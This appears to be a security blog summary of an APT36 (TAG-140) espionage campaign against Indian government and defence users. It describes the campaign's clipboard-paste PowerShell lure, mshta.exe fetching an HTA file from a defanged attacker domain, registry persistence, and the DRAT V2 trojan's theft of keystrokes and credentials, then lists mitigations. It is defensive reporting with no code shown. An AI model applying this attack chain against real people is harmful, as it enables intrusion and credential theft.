The Newest APT36 blockbuster: Tanks, Trains, Rigs, and Diplomats

India’s defense and government sectors have become the setting of a new cyber-espionage thriller orchestrated by TAG-140, a threat actor tied to the Pakistan-aligned APT36 (SideCopy). This latest campaign showcases the deployment of DRAT V2, a sophisticated remote access trojan tailored for Windows environments.

The lure: a convincing clone of the Indian Ministry of Defence’s press release portal. By disguising their malicious infrastructure as a trusted government domain, the attackers managed to turn simple user interaction—copying and pasting a command—into a full-scale breach. Their targets span critical industries including military, railways, energy, and foreign affairs, suggesting a coordinated intelligence-gathering operation with geopolitical implications.

Unwitting stuntpeople

The individuals targeted by this campaign were not random victims, but high-value users whose daily routines brought them into contact with sensitive information and internal infrastructure.

Among them were:

• Government employees with access to official communications and classified briefings.

• Defense personnel responsible for logistics, planning, and secure messaging.

• Users linked to ministries of foreign affairs, oil and gas, and transportation, with insight into strategic resources and diplomatic initiatives.

Their recurring need to consult press updates, internal bulletins, and restricted policy documents made them especially vulnerable to well-crafted impersonation attacks. What appeared to be routine administrative access was in fact the entry point for full-system compromise.

Flames and jumps

The breach began with a cloned version of the Ministry of Defence press portal, visually indistinguishable from the legitimate one. Users visiting the fake page encountered what appeared to be a download button or instruction panel. Instead of delivering a document, the button copied a malicious PowerShell command to the user’s clipboard.

The trap was sprung once the victim pasted and executed the command in their terminal. This triggered the execution of mshta.exe, a legitimate Windows tool that was abused to retrieve and run a remote HTA (HTML Application) file from trade4wealth[.]in—a domain under attacker control.

The malicious HTA script did three things:

1. Displayed a decoy PDF to distract the user and simulate legitimate behavior.

2. Modified registry keys to establish persistence on the compromised device.

3. Deployed DRAT V2, a remote access trojan designed to steal and monitor sensitive information.

   
   

Once active, DRAT V2 exfiltrated:

• Keystrokes to capture passwords and communication content.

• Clipboard data, which could contain copied credentials or internal messages.

• Browser credentials saved in Chrome or other browsers.

• System metadata, including usernames, hostnames, OS versions, and installed applications.

• Local files, targeting documents and logs relevant to the user’s role or department.

All stolen data was transmitted to the attackers through encrypted command-and-control (C2) channels, allowing them to maintain access, monitor behavior, and extract valuable intelligence over extended periods.

And cut!

Mitigating this attack requires coordinated action across users, IT administrators, and public institutions. Each layer of defense must address the specific failure points exploited in this campaign.

Stuntpeople (Users):

• Avoid pasting commands copied from websites, especially government or institutional portals.

• Block the execution of .hta files through Group Policy or endpoint protection tools.

• Report any unexpected file downloads or PDF popups from official-looking sites.

Studios (Admins):

• Implement application allowlisting to prevent unauthorized scripts or executables from running.

• Deploy DNS filtering to block outbound connections to suspicious or known malicious domains.

• Enforce network segmentation to contain infections and prevent lateral movement across systems.

• Monitor for use of living-off-the-land binaries (LOLBins) such as mshta.exe, especially when invoked by user processes.

Production companies (Public Entities):

• Enforce a Zero Trust model, requiring continuous verification for all internal and external access attempts.

• Deploy Endpoint Detection and Response (EDR) tools that can detect and stop threats like DRAT V2 based on behavioral and signature-based indicators.

• Isolate public-facing services from critical internal infrastructure, ensuring that even successful impersonation attacks don’t expose privileged systems.

https://thehackernews.com/2025/07/tag-140-deploys-drat-v2-rat-targeting.html?m=1